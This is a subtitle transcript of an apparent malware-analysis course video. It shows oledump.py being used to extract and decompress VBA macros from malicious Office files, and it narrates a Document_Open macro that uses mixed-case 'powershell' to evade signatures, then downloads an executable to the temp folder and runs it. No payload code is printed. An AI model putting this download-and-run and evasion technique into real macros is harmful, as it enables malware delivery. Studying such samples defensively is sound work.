0
1
00:00:11,680 --> 00:00:13,220
Welcome back everyone.
1

2
00:00:13,240 --> 00:00:21,190
So let us start analyzing the malicious document file using oledumb and I'll be sharing all these analysis
2

3
00:00:21,190 --> 00:00:22,210
files
3

4
00:00:22,430 --> 00:00:29,010
through cloud link, probably through Dropbox. I'll password encrypt those files and I'll upload it there.
4

5
00:00:29,140 --> 00:00:34,990
And I'll share the links in the description sections so you all can download  files and you
5

6
00:00:34,990 --> 00:00:42,610
can follow these videos by analyzing the same file so that it makes things much more clear to you.
6

7
00:00:44,400 --> 00:00:47,460
So let's quickly go ahead and launch powershell.
7

8
00:00:51,120 --> 00:00:58,090
Make sure to run it as administrator.
8

9
00:00:58,230 --> 00:01:08,420
So we are in the flare office directory Now that's where we can start using the program and our file
9

10
00:01:08,420 --> 00:01:10,370
is present here.
10

11
00:01:10,960 --> 00:01:24,380
So OK so to start using oledumb you have to use Python to run the oledump python file
11

12
00:01:26,370 --> 00:01:32,670
first move to be directory. 
Now python oledump.py
12

13
00:01:32,670 --> 00:01:40,230
So before we analyze any files just quickly run the help command and see what all parameters are there.
13

14
00:01:40,420 --> 00:01:44,980
So we have dump, have ASCIIdump,  we have strings we have
14

15
00:01:44,980 --> 00:01:47,180
VBA decompress.
15

16
00:01:47,260 --> 00:01:50,080
We have a raw and bunch of other things.
16

17
00:01:50,080 --> 00:01:52,330
You can explore all of these one by one.
17

18
00:01:52,570 --> 00:02:04,270
So in order to analyze given doc file all you have to do is you have to run oledump.py and you
18

19
00:02:04,270 --> 00:02:08,620
have to pass your office file to this
19

20
00:02:11,230 --> 00:02:12,820
course files.
20

21
00:02:12,910 --> 00:02:15,210
It's called payment.doc.
21

22
00:02:15,640 --> 00:02:18,630
So let's run this file.
22

23
00:02:18,680 --> 00:02:21,820
So here is the output of oledumb.
23

24
00:02:22,160 --> 00:02:31,500
So here you can see that it has separated all the objects one by one along with its size.
It has listed
24

25
00:02:31,590 --> 00:02:37,680
the CompObject, the summary information, table information then it has also listed that there are
25

26
00:02:37,680 --> 00:02:42,330
macro projects inside this particular doc file.
26

27
00:02:42,330 --> 00:02:44,150
Now the one that would be interesting
27

28
00:02:44,160 --> 00:02:48,230
Is object number 7 where it has marked capital "M".
28

29
00:02:48,280 --> 00:02:54,060
And it means that this document particularly contains macro scripts inside it.
29

30
00:02:54,250 --> 00:03:01,450
Now in order to view the macro script, we have to again run the same command oledump.py and 
30

31
00:03:01,470 --> 00:03:11,930
this time will pass the hyphen X (-X) parameter along with the object number which is 7.
So here 
31

32
00:03:11,960 --> 00:03:22,150
it will list the hex value of the object. In order to view a more readable format,
32

33
00:03:22,150 --> 00:03:27,740
We can basically pass the -d  command which just dumps the entire result.
33

34
00:03:27,820 --> 00:03:32,270
Now here you'll will see that there are a lot of unwanted characters as well.
34

35
00:03:32,290 --> 00:03:40,780
These are basically the characters which didn't really get translated into direct readable ASCII
35

36
00:03:40,780 --> 00:03:47,380
characters but it still makes a lot of sense if you look at the code you'll see that it's basically
36

37
00:03:47,380 --> 00:03:54,330
trying to launch command.exe and it's trying to do something with Powershell. In order to get rid of all
37

38
00:03:54,330 --> 00:03:56,460
these unwanted characters,
38

39
00:03:56,460 --> 00:04:02,640
We can basically do a VBA decompress and it will create a pretty nice script for us.
39

40
00:04:02,640 --> 00:04:10,680
So here are the output that we are seeing now is the actual VBA script that is embedded inside that
40

41
00:04:10,680 --> 00:04:12,210
particular document file.
41

42
00:04:12,390 --> 00:04:15,660
Now it makes it much more easy to read and understand here.
42

43
00:04:16,020 --> 00:04:21,510
So if you've seen it has defined a function called document open which means that this function will
43

44
00:04:21,510 --> 00:04:24,860
get executed as soon as the document is launched.
44

45
00:04:25,050 --> 00:04:31,170
What it does is that it launches shell command,  where it passes cmd.exe, basically the command.exe
45

46
00:04:31,170 --> 00:04:35,610
from there it tries to launch powershell
46

47
00:04:36,040 --> 00:04:42,310
Notice the way how powershell has been mixed and matched with both upper and lower case characters.
47

48
00:04:42,310 --> 00:04:50,100
This is done to usually avoid static signature based techniques where you have either powershell all
48

49
00:04:50,100 --> 00:04:53,330
in lower or in upper case characters.
49

50
00:04:53,400 --> 00:04:59,270
So all those techniques can be evaded using these kinds of mixing and matching.
50

51
00:04:59,670 --> 00:05:03,300
After that it's basically trying to initiate a web client.
51

52
00:05:03,330 --> 00:05:07,570
And it's trying to download a file from this particular location.
52

53
00:05:07,950 --> 00:05:12,880
You can see the entire file location here and it's an exe file.
53

54
00:05:12,900 --> 00:05:14,950
It means it's an executable.
54

55
00:05:15,060 --> 00:05:21,270
It's very highly likely that this is the actual malware payload that will get downloaded from this particular
55

56
00:05:21,450 --> 00:05:22,500
office file.
56

57
00:05:22,680 --> 00:05:29,430
It gets written into temp app data and it gets written with the name of playa.exe.
57

58
00:05:29,760 --> 00:05:36,660
So once the file gets downloaded, the next command gets executed is > "Start" this particular file. 
58

59
00:05:36,660 --> 00:05:37,900
Once the file is executed,
59

60
00:05:37,980 --> 00:05:40,610
You just exit the shell terminal.
60

61
00:05:41,070 --> 00:05:47,860
So this was the entire interpretation of the malicious VBA macro that was embedded inside the document.
61

62
00:05:48,030 --> 00:05:50,840
So this is where the delivery and exploitation phase happened.
62

63
00:05:50,850 --> 00:05:55,570
So in the delivery phase this document came in as an attachment with the e-mail.
63

64
00:05:55,710 --> 00:06:01,470
And once you launched that particular document you basically executed this macro in the background and
64

65
00:06:01,620 --> 00:06:05,060
you just downloaded the malware and executed it on your system.
65

66
00:06:05,070 --> 00:06:11,530
And that was the exploitation phase.
66

67
00:06:11,690 --> 00:06:15,990
Let us try the other file as well which is a docx file.
67

68
00:06:16,110 --> 00:06:18,410
It's called Statements.docx.
68

69
00:06:29,890 --> 00:06:37,420
So here if you see, object number A3 contains VBA macros as marked by oledump.
69

70
00:06:37,570 --> 00:06:40,800
So we'll go ahead and pass -s along 
70

71
00:06:40,800 --> 00:06:41,500
with
71

72
00:06:41,620 --> 00:06:43,900
The object number which is A3
72

73
00:06:44,170 --> 00:06:50,710
If you press enter it throws in a bunch of output in hex format.
73

74
00:06:50,870 --> 00:07:05,290
Let's quickly do a VBA decompress on this and this results into.
74

75
00:07:05,390 --> 00:07:08,230
The following script.
75

76
00:07:08,300 --> 00:07:13,940
So once you have the script with you you can just start analyzing it once again just like we did it
76

77
00:07:14,090 --> 00:07:16,290
in the previous video.
77

78
00:07:16,340 --> 00:07:23,790
So this is how we analyze malicious office files using oledump.
In the next video,
78

79
00:07:23,810 --> 00:07:29,340
We'll try and understand how we can use the second tool to basically perform the same analysis.